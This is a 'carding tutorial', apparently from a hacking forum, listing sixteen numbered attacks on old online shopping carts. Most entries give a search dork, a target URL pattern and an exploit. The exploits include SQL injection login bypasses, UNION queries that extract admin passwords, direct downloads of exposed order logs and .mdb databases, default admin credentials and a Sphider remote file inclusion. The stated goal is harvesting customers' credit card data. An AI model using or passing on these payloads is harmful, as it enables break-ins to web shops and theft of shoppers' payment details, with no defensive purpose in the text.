Carding Tutorial

1. most of these are outdated but they can still work if you happen to find a vulnerable site:
2.  
3. 1:
4.  
5. google dork :--> inurl:"/cart.php?m="
6. target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view
7. exploit: chage cart.php?m=view to /admin
8. target whit exploit :--> http://xxxxxx.com/store/admin
9. Usename : 'or"="
10. Password : 'or"="
11.  
12. 2-
13.  
14. google dork :--> allinurlroddetail.asp?prod=
15. target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
16. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
17. target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
18.  
19. 3-
20.  
21. google dork :--> allinurl: /cgi-local/shopper.cgi
22. target looks like :--> http://www.xxxxxx.co....dd=action&key=
23. exploit :--> ...&template=order.log
24. target whit exploit :--> http://www.xxxxxxxx.....late=order.log
25.  
26. 4-
27.  
28. google dork :--> allinurl: Lobby.asp
29. target looks like :--> www.xxxxx.com/mall/lobby.asp
30. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
31. target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
32.  
33. 5-
34.  
35. google dork :--> allinurl:/vpasp/shopsearch.asp
36. when u find a target put this in search box
37. Keyword=&category=5); insert into tbluser (fldusername) values
38. ('')--&SubCategory=&hide=&action.x=46&action.y=6
39. Keyword=&category=5); update tbluser set fldpassword='' where
40. fldusername=''--&SubCategory=All&action.x=33&action.y=6
41. Keyword=&category=3); update tbluser set fldaccess='1' where
42. fldusername=''--&SubCategory=All&action.x=33&action.y=6
43. Jangan lupa untuk mengganti dan nya terserah kamu.
44. Untuk mengganti password admin, masukkan keyword berikut :
45. Keyword=&category=5); update tbluser set fldpassword='' where
46. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
47.  
48. login page: http://xxxxxxx/vpasp/shopadmin.asp
49.  
50. 6-
51.  
52. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
53. target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx
54. exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
55. if this is not working try this ends
56. %20'a%25'--
57. %20'b%25'--
58. %20'c%25'--
59. after finding user and pass go to login page:
60. http://xxxx.com/vpasp/shopadmin.asp
61.  
62. 7-
63.  
64. google dork :--> allinurl:/shopadmin.asp
65. target looks like :--> www.xxxxxx.com/shopadmin.asp
66. exploit:
67. user : 'or'1
68. pass : 'or'1
69.  
70. 8-
71.  
72. google.com :--> allinurl:/store/index.cgi/page=
73. target looks like :--> http://www.xxxxxx.co....short_blue.htm
74. exploit :--> ../admin/files/order.log
75. target whit exploit :--> http://www.xxxxxxx.c....iles/order.log
76.  
77. 9-
78.  
79. google.com:--> allinurl:/metacart/
80. target looks like :--> www.xxxxxx.com/metacart/about.asp
81. exploit :--> /database/metacart.mdb
82. target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
83.  
84. 10-
85.  
86. google.com:--> allinurl:/DCShop/
87. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
88. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
89. target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
90.  
91. 11-
92.  
93. google.com:--> allinurl:/shop/category.asp/catid=
94. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
95. exploit :--> /admin/dbsetup.asp
96. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
97. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
98. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
99. in db look for access to find pass and user of shop admins.
100.  
101. 12-
102.  
103. google.com:--> allinurl:/commercesql/
104. target looks like :--> www.xxxxx.com/commercesql/xxxxx
105. exploit :--> cgi-bin/commercesql/index.cgi?page=
106. target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
107. target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
108. target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log
109.  
110. 13-
111.  
112. google.com:--> allinurl:/eshop/
113. target looks like :--> www.xxxxx.com/xxxxx/eshop
114. exploit :-->/cg-bin/eshop/database/order.mdb
115. target whit exploit :--> http://www.xxxxxx.co....base/order.mdb
116. after dl the db look at access for user and password
117.  
118. 14-
119.  
120. 1/search google: allinurl:"shopdisplayproducts.asp?id=
121. --->http://victim.com/shopdisplayproducts.asp?id=5
122.  
123. 2/find error by adding '
124. --->http://victim.com/shopdisplayproducts.asp?id=5'
125.  
126. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
127.  
128. -If you don't see error then change id to cat
129.  
130. --->http://victim.com/shopdisplayproducts.asp?cat=5'
131.  
132. 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
133.  
134. --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
135.  
136. --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
137.  
138. 4/ add 2,3,4,5,6.......until you see a nice table
139.  
140. add 2
141. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
142. then 3
143. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
144. then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
145.  
146. ...5,6,7,8,9.... untill you see a table. (exp:...47)
147.  
148. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
149. ---->see a table.
150.  
151.  
152. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
153.  
154. --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
155.  
156. 6/Find link admin to login:
157. try this first: http://victim.com/shopadmin.asp
158. or: http://victim.com/shopadmin.asp
159.  
160.  
161. Didn't work? then u have to find yourself:
162.  
163. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
164.  
165. --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
166.  
167.  
168. you'll see something like: ( lot of them)
169.  
170. shopaddmoretocart.asp
171. shopcheckout.asp
172. shopdisplaycategories.asp
173. ..............
174.  
175. then guess admin link by adding the above data untill you find admin links
176.  
177. 15-
178.  
179. Type: VP-ASP Shopping Cart
180. Version: 5.00
181. Dork = intitle:VP-ASP Shopping Cart 5.00
182. You will find many websites with VP-ASP 5.00 cart software installed
183. Now let's get to the exploit..
184.  
185. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
186. The exploit is : diag_dbtest.asp
187. so do this:
188. ****://***.victim.com/shop/diag_dbtest.asp
189.  
190. A page will appear with something like:
191.  
192. xDatabase
193. shopping140
194.  
195. xDblocation
196. resx
197.  
198. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
199. the most important thing here is xDatabase
200. xDatabase: shopping140
201. ok now the URL will be like this:
202. ****://***.victim.com/shop/shopping140.mdb
203. if you didn't download the Database..
204. Try this while there is dblocation.
205. xDblocation
206. resx
207.  
208. the url will be:
209. ****://***.victim.com/shop/resx/shopping140.mdb
210. If u see the error message you have to try this :
211. ****://***.victim.com/shop/shopping500.mdb
212.  
213. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
214.  
215. inside you should be able to find credit card information.
216. and you should even be able to find the admin username and password for the website.
217.  
218. the admin login page is usually located here
219. ****://***.victim.com/shop/shopadmin.asp
220.  
221. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
222.  
223. Username: admin
224. password: admin
225. OR
226. Username: vpasp
227. password: vpasp
228.  
229.  
230. 16-
231.  
232. Sphider Version 1.2.x (include_dir) remote file inclusion
233.  
234. # Sphider Version 1.2.x (include_dir) remote file inclusion
235. # script Vendor: http://cs.ioc.ee/~ando/sphider/
236. # Discovered by: IbnuSina
237. found on index.php
238. $include_dir = "./include"; <--- no patch here
239. $language_dir = "./languages";
240. include "$include_dir/index_header.inc";
241. include "$include_dir/conf.php";
242. include "$include_dir/connect.php";
243.  
244. exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu